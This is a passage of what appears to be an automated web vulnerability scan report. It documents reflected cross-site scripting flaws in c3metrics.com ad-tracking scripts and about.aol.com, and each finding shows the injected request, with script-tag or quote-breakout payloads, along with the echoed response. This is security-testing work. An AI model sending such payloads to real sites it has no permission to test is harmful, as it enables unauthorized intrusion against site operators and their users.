Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:56 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:59:56 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadverd7f22%3Cscript%3Ealert%281%29%3C%2Fscript%3E7b75f73abf2_05-05-2011-00-59-56_3893459661304557196; expires=Tue, 03-May-2016 00:59:56 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adverd7f22%3Cscript%3Ealert%281%29%3C%2Fscript%3E7b75f73abf2_3893459661304557196; expires=Thu, 05-May-2011 01:14:56 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adverd7f22<script>alert(1)</script>7b75f73abf2';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='389345966130455
...[SNIP]...

5.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7acb7<script>alert(1)</script>73974861fc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/7acb7<script>alert(1)</script>73974861fc3&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:27 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 01:00:27 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-01-00-27_14374677881304557227; expires=Tue, 03-May-2016 01:00:27 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_14374677881304557227; expires=Thu, 05-May-2011 01:15:27 GMT; path=/; domain=c3metrics.com
Content-Length: 6680
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='14374677881304557227';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/7acb7<script>alert(1)</script>73974861fc3';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 93c9a<script>alert(1)</script>cc2d4b62d7a was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=93c9a<script>alert(1)</script>cc2d4b62d7a&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:01 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 01:00:01 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-01-00-01_3147161271304557201; expires=Tue, 03-May-2016 01:00:01 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_3147161271304557201; expires=Thu, 05-May-2011 01:15:01 GMT; path=/; domain=c3metrics.com
Content-Length: 6698
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='3147161271304557201';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='93c9a<script>alert(1)</script>cc2d4b62d7a';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

5.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 93096<script>alert(1)</script>716cb79c236 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=7293096<script>alert(1)</script>716cb79c236&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:00 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sat, 02-May-2843 01:00:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-01-00-00_1648367301304557200; expires=Tue, 03-May-2016 01:00:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_1648367301304557200; expires=Thu, 05-May-2011 01:15:00 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='1648367301304557200';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='7293096<script>alert(1)</script>716cb79c236';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

5.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload ebffd<script>alert(1)</script>c867e4ea0b4 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=ebffd<script>alert(1)</script>c867e4ea0b4&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:02 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 01:00:02 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-01-00-02_7091964531304557202; expires=Tue, 03-May-2016 01:00:02 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_7091964531304557202; expires=Thu, 05-May-2011 01:15:02 GMT; path=/; domain=c3metrics.com
Content-Length: 6678
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
S.c3VJSnuid='7091964531304557202';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='ebffd<script>alert(1)</script>c867e4ea0b4';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 5f4c4<script>alert(1)</script>6979d01a44c was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=4805f4c4<script>alert(1)</script>6979d01a44c&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:37 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s1; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=4805f4c4<script>alert(1)</script>6979d01a44c&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=ne
...[SNIP]...

5.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 7e328<script>alert(1)</script>7a09c59ed8f was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver7e328<script>alert(1)</script>7a09c59ed8f&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:15 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Content-Type: text/html
Set-Cookie: SERVERID=s15; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver7e328<script>alert(1)</script>7a09c59ed8f&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;
...[SNIP]...

5.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload f789d<script>alert(1)</script>2df104e1cea was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=72f789d<script>alert(1)</script>2df104e1cea HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:37 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s2; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=72f789d<script>alert(1)</script>2df104e1cea&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new Reg
...[SNIP]...

5.10. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aol_pp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d43fe"%3bbb310a036eb was submitted in the REST URL parameter 1. This input was echoed as d43fe";bb310a036eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetworkd43fe"%3bbb310a036eb/aol_pp HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617329219-Repeat%7C1367689329219%3B%20s_nrgvo%3DRepeat%7C1367689329221%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:41:22 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10535
set-cookie: dcisid=2899132428.408601165.4098949120; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10535


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm64 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm64.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetworkd43fe";bb310a036eb";
s_265.prop2="aol_pp";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.11. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aol_pp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f70b"%3b4d061b326ea was submitted in the REST URL parameter 2. This input was echoed as 6f70b";4d061b326ea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork/6f70b"%3b4d061b326ea HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617329219-Repeat%7C1367689329219%3B%20s_nrgvo%3DRepeat%7C1367689329221%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:41:38 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10521
